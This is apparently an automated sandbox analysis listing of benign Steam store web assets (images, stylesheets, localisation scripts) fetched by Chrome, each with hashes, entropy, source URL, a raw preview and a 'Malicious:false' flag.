        Preview:....function mute_session( bMuted )..{...SetGameHighlightAudioEnabled( !bMuted );..}....function auto_play( bEnabled )..{...SetGameHighlightAutoplayEnabled( bEnabled );..}....function volume_session( flVolume )..{...SetGameHighlightPlayerVolume( flVolume );..}....function BIsUserGameHighlightAutoplayEnabled()..{...//the cookie is stored as the inverse...var rgMatches = document.cookie.match( /(^|; )bGameHighlightAutoplayDisabled=([^;]*)/ );...return !( rgMatches && rgMatches[2] == "true" );..}....function SetGameHighlightAutoplayEnabled( bEnabled )..{...var dateExpires = new Date();...dateExpires.setTime( dateExpires.getTime() + 1000 * 60 * 60 * 24 * 365 * 10 );...document.cookie = 'bGameHighlightAutoplayDisabled=' + (!bEnabled ? 'true' : 'false') + '; expires=' + dateExpires.toGMTString() + ';path=/';..}....var g_bUserSelectedTrailer = false;..function BIsUserGameHighlightAudioEnabled()..{...if ( g_bUserSelectedTrailer )...{....return true;...}...else...{....var rgMatches = document.c
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):4691
        Entropy (8bit):7.896187016017341
        Encrypted:false
        SSDEEP:96:vlSRFm47QOD2RGytTefvO7lR+eyvzWZmGd2Efic+a9q1jXeekxT6:YFxlD2dTCvOiA1XicvAzVkx6
        MD5:2DE40A77413386EDDBE1E4AD40917D67
        SHA1:A028E21F35C85C10B788779A701EB5D5DCC133C9
        SHA-256:31B4E36925F37803761B2F96414ABC0AF31081A3A3560AB509BC9492F2E359E4
        SHA-512:BA47FA0998A1EDB5B2CC324EB2BF2EC9F34392F18411C6839030997BFE4AA05E36AC5E3588B559AEEAC4A23140F7D8CA763C0BDF33C220666508E09DA74DF7F4
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_a62978b2a16aacba2bc99e6e41e56a524116ef02.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................G.........................!.1..A"Qaq..#23...r..4B......$...%568bstu................................./......................!.1A.".23Qqa......C................?...d........GQ#C$..X..q....Oa..lj=.h...V]..wY.T.J..O..T...u..#..$`p.9."...O3........v...%m...:TH..0.....d..3..uTB....f.?G|3..a..nXU.Z.E....K.t."^....<.5.....K..&u.Y.L.T..X...8d'.?....&J.srb.......v........,......br...q..y.....^?)1#..I.73.n7...R.:..i..P..%.p.....s... .Z.G...1......q..Z...;..9.)....+.........q.v.+*.q.(....X.r.....vM.-.k..CL...R7...u....y....!@.1..Y..\.S..2..J.=...]P.....q.[5B..-.U..(O z~..J.. .#bw...b..fP....n1.......{^.......G..GA. t..<.5....gI1..1..G7]..aV.........\0S.{M.......>.j)^...}.5.`.(..j.36$....?<~ZX.TT>..s..m.wn.u.uT2..ZQr......(...."1.........q;..;.R.z.Kex5......._s
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):5449
        Entropy (8bit):7.916921346487798
        Encrypted:false
        SSDEEP:96:vhb0wo1FggHl/+LQJ0JR94jzBYmFceZvSfe3OBAn/S9bkJAgh+nc:iHUQzBYmFczfUO9bkhonc
        MD5:1B7C8FC062B8D2837E87B10F4AB8CED8
        SHA1:2FC99FB0B94B0B08B2A3D06F2671244D6CAA5483
        SHA-256:E4308B99AFAB79BA96216118F0B2060CBB1D5FE1EBE00EC368E098B6C6A9AF53
        SHA-512:74F0EFDB47A8F8130AF278EE5FEA3C842EF197E0244B41315D49A16143A0436AF4425AF8F8B2ED2997351EAB68F545B5FBA9FCADA1034B0ECB8428A48AA2236A
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_124fc21b3e72a39edb14ed2ea012d6b2c64c4432.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................=..........................!.."1AQa...#25qrs....346BRb...Ct................................/......................!..1AQ."2aq..3.......#.............?...!.y.?.qQ.O<....^.8..:..|.`.U.{x^..+ro..^5....s...S..%..q..H4..5.x..H..n.{+H.Q7....W.~.bf.o..S...yR..\..B.b.P..Jm...U.....a..5P..q.${6C."ng..p...3C)nD..S..Q...`G.J...'.. }.F.....X..{Ggn..._..S.5....6..s.....&...A....P.....8U..3.xk2.s$F..,.@...5..4........./.M.....26V.-D..".J.ZMI%UX...Y-GXJ.-.5on...X.".N.&..y......<.I..../J..._..u.A|y..b...4.q...H.z...|.UL....d.....J:/...+'P.44?..M.xU6vd.'{)q_.S.f...<Yj.*.....=..\_.....I.../.cN...<....r.t.\.+7T@.L....u(}e....~..}..e........F[.fE...=2,...al...\.AdXXmo#.uX..V=W.oK..1/...><.8.4.j..U(R...._*#ohKo.S...&...q..y.Y_......O..<......ff...%U,. .._1...Th..)&...R.w.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1667), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):18931
        Entropy (8bit):5.515016108460179
        Encrypted:false
        SSDEEP:384:QwtVMAjYb2JalUNlpczHK7DTiHiEiN/mm+pqOw6GNNZhweP8/F:QmS6FJJNzczHK7D2Hix/T+pqOwlNzi
        MD5:086F049BA7BE3B3AB7551F792E4CBCE1
        SHA1:292C885B0515D7F2F96615284A7C1A4B8A48294A
        SHA-256:B38FC1074EF68863C2841111B9E20D98EA0305C1E39308DC7AD3A6F3FD39117A
        SHA-512:645F23B5598D0C38286C2A68268CB0BC60DB9F6DE7620297F94BA14AFE218D18359D124EBB1518D31CD8960BAED7870AF8FD6960902B1C9496D945247FBB2D78
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=russian&_cdn=cloudflare
        Preview:...responsive_page_frame {...position: relative;..}....body.movescrolltocontent .responsive_page_frame {...position: fixed;...top: 0;...right: 0;...bottom: 0;...left: 0;...overflow: auto;..}....body.overflow_hidden,..body.overflow_hidden .responsive_page_frame {...overflow: hidden;...position: relative;..}....html.responsive {...height: 100%;..}....html.responsive body {...min-height: 100%;...height: auto;...position: relative;..}....html.responsive body.movescrolltocontent {...position: fixed;...top: 0;...right: 0;...bottom: 0;...left: 0;..}.....responsive_page_content {..}.....partner_events .responsive_page_content {.. height: 100vh;..}.....responsive_page_menu_ctn {...position: fixed;...top: 0;...bottom: 0;...overflow: hidden;.....background: black;.....z-index: 30;...width: 280px;..}.....responsive_page_frame:not(.in_menu_drag) .responsive_page_menu_ctn {...transition: left 0.5s, right 0.5s;..}.....responsive_page_menu_ctn.mainmenu {...left: -280px;..}.....responsive_page_menu_
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (24106), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):31302
        Entropy (8bit):5.239125502804131
        Encrypted:false
        SSDEEP:768:j6gfMT+dKt1KmO+5Pf9ctxV9dT5o6m+qm19lhlC8OVRlmAKtxO6w:jzMTEIO+F9ctjqm19lhlYVRlmAKtxRw
        MD5:2259EE699B0BF121C6612B25CD41B83D
        SHA1:D3508E3B036382F9C873EDAD929E62BD5790B88F
        SHA-256:FE459CD674AB7FF3C63F74C0A0140764253101036E786D6FD09D1FA90EB55548
        SHA-512:E5D768640EEBF0D14E403B56D411C135B389CFDA9B3E03A0DF2B074785EB28DE513F83CCBAEBE744C73EC9F936CD397F77FF9B669B25C1AF060128FA357B4100
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/marketing_russian-json.js?contenthash=30c4c0bb291bcd1c7cf3
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[903],{10557:_=>{_.exports=JSON.parse('{"language":"russian","label_play_free_until_custom":"....... ......... .. %1$s.","promo_ends_custom":"............. %1$s.","label_play_free_generic":"....... .........!","label_free_weekend":".......... ........","label_free_week":"...... .........","label_just_updated":"..... ..........","label_for_a_limited_time_only":"........... ..........","msg_prepurchase_and_play_beta_now":"........ ......... . ........ ...... . ....-......!","msg_play_beta_now":"....-.... ... ........!","msg_prepurchase_and_get_beta_access":"........ ....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 744 x 171, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):10863
        Entropy (8bit):7.893336023408476
        Encrypted:false
        SSDEEP:192:5ARjfa23tAJsqmbZEyI3ImwTHVeVUzp7C+22Z6XikPFffq0BV0FIZLKePlOoYWn4:5AfaItAJsfElI3jVwUzpC+JqNfC0wFIM
        MD5:A4E79C73EE13CB25B60FC4B0BA1F690C
        SHA1:B690C31B2EB1B0EB085E91AAAE7E79F03DEBE7C1
        SHA-256:6CB869DF089146C12EFB5E9C968E911C314842624BA6F052A11346AC734CADC8
        SHA-512:AAD423119F410A655F0AA475D2FE692087D7262C3986CE71347981C5B60F6A10031D7050BF9B9AEE4E7D84D814F0B8883C964028FCBE14ED3464602F3BA6CEC3
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
        Preview:.PNG........IHDR.............4.i{....sRGB.........gAMA......a.....pHYs..........o.d..).IDATx^...}U......|.hp(..%1..H.DQ..(..H..HF..H..(.B1...hP.B1.."1..")...(."..I.".x.....:.9.......>.c....~....>..c.....7O?..sDDDDD.....QDDDDD.......S...g.Nj..........h.EDDD.F........N;.B.r..!.%.phm.9.....\DDDdr4.25..].:/..?%4...a...}.H.........]..!..qm.....|m..]DDDdp4.24...$....R..>....{..y.""""..A.! .....C.s.....0......""""}.A.>...{Co.../,..K1._.Qt*"""r..t..r.?.z..l.`.?......tB...@^..Ctb...h...QuZ;....$.A.\..zW.cN.r..c!"._....""".....pY..C.$.'CD.?......N4..+B..1PH.CD....`DDDDZ..G.6...G.!........Bg......M4..r...".\....OB..../""".....&Dy...1..:.\.bJ......t9.....2..w"....&....H.....C..!...t0...Qu...Y(F..u._.4..C..v0.Z....."./.....:eu&%@..B....""".@LqY&.?RZ.^.I..(ty.....,....xA.^.....oCo..|u&""".G..,.......S.KC.b...Y../.".?.i...;....SDDDf..}.\."rNz...u...:.UDDd.h......)_?....z..LDDDf..}.."r.9....].......Ht..6D..I.3.#..l.EDDd.h.....9.2_..zG..........8;..|..9..wWg"""
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 176 x 50, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2584
        Entropy (8bit):7.591818812076699
        Encrypted:false
        SSDEEP:48:4wqQNn2xoJ35l3QWpQSufhbTCFV0Q0jkIPIH+UCKPnaqiLruSd+1w:oY2ml31ZCdqWQMkADnK41d+1w
        MD5:86A9CCC0B872F22006A48BC6C2500F4E
        SHA1:0EDCCF2CBC869816135C6FF4C3EEE0C49D0F41C1
        SHA-256:D8BBE461137D50211568449468A1981EF189248200EADD48C3141A9DF0B8F7FC
        SHA-512:43EBD681FE137718E45153B9CE062CE9426AC57D6CE907BD3B1C7709BF6F6D2AB4B49E22F2DC4F203DEDF860A895A4B58F4A01095E97722CE5F27935038F0B56
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/footerLogo_valve_new.png
        Preview:.PNG........IHDR.......2.......Q.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:595356BA543311EAAC5FF1C3D4DCAF18" xmpMM:DocumentID="xmp.did:595356BB543311EAAC5FF1C3D4DCAF18"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:595356B8543311EAAC5FF1C3D4DCAF18" stRef:documentID="xmp.did:595356B9543311EAAC5FF1C3D4DCAF18"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>tU......IDATx..][l.E.....Q(.....11.VTL."....cb.1../.`x.x...&..F}P.....$*........J..5^Z5..@Kc...3...?{f.....%_...f.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7145
        Entropy (8bit):7.923638168414437
        Encrypted:false
        SSDEEP:192:m9LKvrLGof2DzZzAzDTmIkVyeQk47/p704:m98nGOkMw0eQk47/d04
        MD5:FB78B9985A1EC14E13430F820CC5905D
        SHA1:A7AD4949F4E3CF08159F989A2911BB9EB19BF442
        SHA-256:D5FA07A7BF1F26CF2EF9DA95967F54AA4B1B5FB662C1BEF13212FDF5AD304F0A
        SHA-512:07E3AA19F560C70B8EC9E06C1A1AE9B67C3B920C6841A1953888E276CE9748989CE2271F82D9D8C340E5DE7E122B7C39899A9375F047630179BD3A0212B8EDF4
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1675200/capsule_184x69.jpg?t=1699990406
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E...............................................=...........................!1..A."Qaq..#2..BR..$s.34S...r...................................6.......................!.1.AQa..q."....2...#BRb................?...#..-.hB. ..!l.J....D..........d..?5.Hyj!hI..I.=s.Bpf.b+.j..1..0.G~....*F.Rwc..[Z....2... .#H.&.w1.....@.pW.Cg.R....<..vBb.......R3..DBi].Ly.....F. .. .!....TZ9\.A8. .#.3...$K..B....]?.@...2:.5....0z.Q..%.z.5(.....DB.Q..e,-Ju(..I....:...D.}.R...D.8..../.I...!G..O.B....r..*.v...k....F...=.... ......K..Z........U.x..lEGq..[ c=.q....@.&..].....zS.mHI..'8)...\.A...L.U..u.M3...\b.q....Y*Y.#..Lw'J..VB...'...#k..)..$..gL..]..>..-.=B.I?bA..)n.)..mP.m*W.Jl..I.......J.mkR..LN......h.f+..-...2.....'<@..'..Z.w........\2..=4~-#S.q...RJ&F...]....st.>..bT.._'..6.TG.q.lu.......r. )I...$.......1.....$'.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 19 x 12, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):161
        Entropy (8bit):5.889732387119839
        Encrypted:false
        SSDEEP:3:yionv//thPlmztjllRl/HRthwkBDsTBZtmmAQGzlkWX0N/khY1RtjhCq/4cL+/XN:6v/lhPoJnDsp1AQIlBE91RtjhCE4cK/9
        MD5:F2DAE37ACAC6B9D5A91CAF1885C2F7D0
        SHA1:5F80FDDE9F702A1D7589BC5FAF88C14066E26C32
        SHA-256:93B1FBE4F6245B62BFD4C8C3347ABE0FE67ED711315E59BFADAEBC9873D8D9B5
        SHA-512:8D7FF7133AB97D81985C50FA8FD93916B42B1CE812AF21BC732DCAE45D59B9154FCC965857235D925C471DB191DFB79C0753C70C7A4D5B0285B908E396216805
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/popups/btn_arrow_down_padded.png
        Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...CIDATx.b...?.....6....@.........6.h..1..A....@....fH.^.g.HO.......#.7.d.].....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):68667
        Entropy (8bit):7.979174644428348
        Encrypted:false
        SSDEEP:1536:w4BsR9yP/q7zwMcPmr//m+yF3S5/AfFMmkZ62EAnYxaVIRTk:wD9iiH/NyFSBKFf7AnYDRw
        MD5:DC9680BFE6E1CE4BF361C02587019AE2
        SHA1:2B17947443650E6E010CB8438E1704F690E063EA
        SHA-256:EBE4852D5F7107351C2BBD052A6256C81E3D3138E7DB744C8A0CDE1F453476B5
        SHA-512:42E77776BD85A053301F40B361C803678719E54DF33711931BA49638254DC93120FD5C8734BBCA265806A0A77EE1084EFFC72AE3650F9D9E51774BB1C454541D
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/3008050/ss_72a7daa689f7fb6122eca53987ea9a64c3a20da3.600x338.jpg
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................Q.X............................................i..........................!."1AQ.a...#2q..$BR.....%3DTb....&45CSUcr.....6Edsu....'7VWet.....F.....G.....................................E.......................!1..AQ.a...."2Rq.......3BS..#4r$b..5Tc.%C...............?..8..O.....r].......1...7.<.kT...}}oC....*..R.7..i...V!......}......;^-....{.7.q.K...pw..@.lTD5.0/.....x.....:....X.....]..U.\..|.l.)a1{....v.zu>..l|ULV.z..N....$..6.S..8..4.m(h.....a.v^..).pRm&.\...;O..U#.....B=X.....3h$.3,..F:^-.~.{.w.q.........V..9..0V.(...X..i.]Q...Nf`.....-..E.X........*z+[.......^x.,*T.....5\gYv.2QPy....... .`#..m.....M7e.Y...6.2Ud.F..L.1> J..).M.....r..<]..(...a..Iv..a]B.......d.-.5.K....'.W.Y...MU,9)Qq#j.r...P...8..b........>...*.X.._.q.k..QyU9......Tz.p..I....;..v...<...M.:.?b#.58.I..m.d.b.:.._.......H..qIy..f
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):28500
        Entropy (8bit):7.968803646393694
        Encrypted:false
        SSDEEP:768:1I/0BgLobGfrIpNozbJnrCoJYIc8ziKZRinXosQS6k:1I/0zTMzbJnrCvhKwNQvk
        MD5:D69D146E424ED831D7EE45FBC7AB42C0
        SHA1:463175D25CBD437621EACE08576F88A5EC6B3AE0
        SHA-256:C06137FEB1714BD03D848804D3AFE1572792A761BB92005B3BBCECB2D7314B11
        SHA-512:A335041C75775D9BBEC3142F32A3B86B66E770FE4412F1187D38746477CC6CED9A29F93F77599DF0B67A6EB9A6AF992AAD1E43EB4D730913D76705F335BC42AA
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1039880/header_292x136.jpg?t=1713632726
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................E...........................!1.A."Qa.2q.....#BRbr...$3....4CScs.......................................<.......................!.1.AQa.q.."......2.B...#R$3b.r..C.............?..2H...)...F....M&IUQ..z.5.0(?rm...........`.g.v.-..J..K....j).I#!.....]j...".)%&...N..h.P.....Bk...k.j.8.....U...Q...#Q...w..}..j@Wx.YI.@.*....(>U.5eHQ[d...8.3.R...ur.T&*e....Ldg.hd....<"7.{...UT.rn.:....Z.{..Ul....e.....\..O.Rj.,.h...7.....T"h`..-...W'.4*..Jk..i...iMUH.MJ9..}..:...u8BGS..LXB..........^.[m.l+RxS.[...T.......@...Iw....i.W..?......^V.....#m|>n;.j..1...))Z.....1...Qv...7...+..z........S.4sa.;gc..J8.y0'...j...#w..F.{.E$...x...4.......=..(TT.(~[x...s.....1.&......:..4..E...Jr....x...+9...[G:.6.H(......n.u_.....H.`B...[......m...Y..Q.."?.J...0.D..q.p..Td..v.:...I....&j
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2843
        Entropy (8bit):6.967423493204583
        Encrypted:false
        SSDEEP:48:o2/61MYLNnwknA9WpitbEsg9wlO/cHJ3z3VHi3bEs/Hc5mmDhhIZwldFWbd/9maH:/SyYRwknmWpiVbgx/mHqb/Hc5thdlubX
        MD5:41E851F8E42B6BF3414278871E93E8A2
        SHA1:A3811C7E1157F77950EC1F0558293BC90E432E82
        SHA-256:399F74C4E69EAC8B59B149293F9A573955FEF0A62B242CFA70346070013E0966
        SHA-512:F3C3549F1390B52791196E6F19584CBD4C4DB2B51FEF78C9C607C944079FED69B75E8F88594C3D647F2DDC29F282BF41BE455BE328AB27C091B4A37C41B00965
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/logo_steam_footer.png
        Preview:.PNG........IHDR...\.........:.;)....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2019-08-09T13:37:29-07:00" xmp:ModifyDate="2020-06-17T17:39:04-07:00" xmp:MetadataDate="2020-06-17T17:39:04-07:00" xmpMM:InstanceID="xmp.iid:a6176093-d0df-1f4a-86f8-26e70acca1dd" xmpMM:DocumentID="adobe:docid:photoshop:5cf069c4-c89c-fa4c-8c00-dff9f3add583" xmpMM:OriginalDocumentID="x
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):404
        Entropy (8bit):7.228296540041501
        Encrypted:false
        SSDEEP:6:6v/lhP1RnDsGgInWSu06zOFn+G1zZ59nkI6fg3yM+sKJcOA0SxVvnkjv8QRcjp:6v/79GTInOkt1zZ59kxfg3J+srNSgHN
        MD5:4B05B817684C262DA91E9B4CFA5631FF
        SHA1:E749387B89A9AEB79C5EB0E52312E35C7CE295F8
        SHA-256:B2709FFCD4928BF069AFB3E5293FE11D33E6470EB6D58965D83E74C05F00573F
        SHA-512:37E24D64B7C1806CC72DC5F3759D51B1E56FA0FEF8726E7EE7F62E85819A1194DE9DB6C5C7436A69C8850FDEA190F2643D418C8A440606AB2BD1166F549334B7
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b`..#...........m.3~i...X3..'..|..&.8:.....I6V.......[KS.......o....@ ""laf.....w.... `gg716....~...?.Z.D^......kanF}. {........?....-..........H..8....k.3Q+...`u..UL.:.........g...`..'O..Rj..%K.[.G...<}.l..).n...L....b......T.BF|N.>...SD.g!5>'M.N...`..9.. ..DYp..9....O2.....(.X..`.ywz..45.....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 59x59, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):26393
        Entropy (8bit):7.968677531645298
        Encrypted:false
        SSDEEP:384:0U7qvom3zuxQWjV5gnKj8okS5IO8NpqozIm+CRU3GS9nKAYrq0S3rGgP:0U7OE2nK8QIDvDIm1snnzv0SKgP
        MD5:590397FCE997897436C8F83754B5EAEE
        SHA1:D428EC72F0C502DE6D2A96A79B586EFBCF947B92
        SHA-256:212F36D01CBF9506F481718EDF1A3BD4337A4942021013D5F217F043425872B5
        SHA-512:F77E8AFB50D89FE207357EE9CE87FC2CD6E90E6FC411B2AFD3DDCBF3BA38B2805A972702884D79B60A6EDDB80E3ABDEE98E7D02F97F76DE3C84CF97F0A71CE88
        Malicious:false
        Reputation:low
        Preview:......JFIF.....;.;.....C....................................................................C.........................................................................$............................................U............................!1.A."2Qaq......#BV....3Rbu....$&6r...4CFdt...%c.........................................L.........................!1.AQ..aq".....2BT......5Rr...#Db$%S....34..Cc...............?...b.]..P...j{.;i.O.T.%.D.lt..1^.....X..)(.s-q..5.~<.E..7.d?....._...^O.s.^..oid:.....8...&........\+.I...8..M.`...J.}.*t..z.4.q..1<\|BI.....^...$.T#....a7.^Ks.Cw..{kd.D..C..nx...E88'.H.i{lA... ........^.@.V..?.......6...aS...'..~....h.@.....3....'..~....h.@................./.)..!...........q..G..M....hg..e.N..'..j..Y.....'l&.+....8*.J..T.~d..Z.r...'.g.V.%.].*..I=.$AS.H..A.g....19^...$...!FP.v8+....1S.P.(....S....@.._.i...?.S.f...J|).....y?m.g..?.S.f.....C._...^O.s.Y.............W.?....V~<;C..7.l?..>.?U.O....>.....~.M....hO......y
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1500), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):66597
        Entropy (8bit):5.316324323622808
        Encrypted:false
        SSDEEP:1536:7lzlu+sXa8xbBd5sofrFbVtfy2nYICl8RsiPML1qSkAIA3UZBLuVxLvxu+oPkfuJ:7lzlu+sXa8xbBd5sofrFbVtfy2nYICl4
        MD5:D8352A28EC4431B3E40ED5D6309F391B
        SHA1:C96B262288983DD072490C491E779D800037A036
        SHA-256:C1314A3F584462E06F775B9871E66E674903908B37EA4FFB0154B9ED94279AF9
        SHA-512:E698E7206BE6A049AFD6AA03AA1AAC5E6193BAC07441F1859E1E6A243B36AEA9C4AF83E537C6694BDE86FEF7644411F6096B682E5A29F43F391CA97D121F6DCE
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/css/v6/recommended.css?v=2DUqKOxEMbPk&l=russian&_cdn=cloudflare
        Preview:...page_title_area.recommendation_title_area..{..}.....recommended_home .page_header_ctn {...background-position: top center;...background-position-y: -95px;..}.....recommendation_bodytext..{...font-size: 14px;...color: #8f98a0;.....font-family: "Motiva Sans", Sans-serif;....font-weight: 300; /* light */.......margin-bottom: 8px;...margin-left: 8px;..}.....recommended_bodygradient..{...padding: 60px 18px 22px 18px;...color: #c6d4df;...line-height: 19px;..}.....recommendation_section {...margin-bottom: 17px;.. margin-top: 24px;..}.....recommendation_mainsection.friends_favs,...recommendation_mainsection.recently_viewed {...margin-top: 50px;..}.....recommendation_section.recommended_by_friends {...margin-top: 50px;..}.......recommendation_rule {...border-top: 2px solid #262626;...margin-bottom: 34px;..}.....recommendation_highlight {...position: relative;...background-color: rgba( 0, 0, 0, 0.2 );...width: auto;...min-height: 215px;...padding: 18px 16px;..}.....recommendation_highlight
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1 x 1
        Category:downloaded
        Size (bytes):807
        Entropy (8bit):0.4261982118465057
        Encrypted:false
        SSDEEP:3:CUlFE/xlzeze:zFEGze
        MD5:39BC952559E5A8F4E84BA035FB2F7390
        SHA1:4F415467396B4A50149373CA75BCB4C04C2F60B6
        SHA-256:8F73EF54EFC672061F69CA881FE318DCCC6DD67D993CBB8E76E53E52C84EE493
        SHA-512:C7E107E803941A965A173EC8DC7DDFB052C042AB0070E92E5FF47D0E02ECB38446BDC13BBF201D68B2F5696AFBEEA1AF494A65EED4B086EF368CF147892E4409
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/blank.gif
        Preview:GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 236x236, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):66948
        Entropy (8bit):7.9687120896744235
        Encrypted:false
        SSDEEP:1536:hnkNUFegs9rirYXSyRYE61eamP2DZo8k47OQ5kg3:hnkNRgyG6S46122NoQ7OYV3
        MD5:2F7B23CD9C4010CB320A6E340FC55A8A
        SHA1:27A8B840862E53CC0F94CAD4A14E6AE32F5AA82C
        SHA-256:AC15E9A984422C025749F9B81028085D61903304D4CE641B4FF8068C27B5E7D3
        SHA-512:5FD43A82551653AE055FC2570E880391BE03B05824EACEF5942E83C55C6A1C6FEBD8E65313FA2D116D1E61CA8F0347603903C854D2DA0D92AAC0E170F986D445
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C......................................................................................................................N..........................!..1A."Qa.2q.#B....R.3br.....$CS..%...4ct..&5DT....................................A.........................!1AQa.."q........2#BR....$3br.%4...C.S............?....)'..2.^..K....q.B....}.8)....D.........1u6.......Dr..f|~..U..)..e.m...........y...).$....H\.......l>..Ub,\.P.#.oCP.5.>._..*t%.X...6...:...S.X..76..1A#.~...0.LiR.Tj.h.....[f.....p..}..l......+J....x..W..KV$os......k.|XMzk...X.,..4..t...)........."...I;VA. ....;...S..~^..Z..<;.qJ..c.0\..*4Wi....JG..H.mw.~..j.s..q....J.....&"=#.j....7.e.' 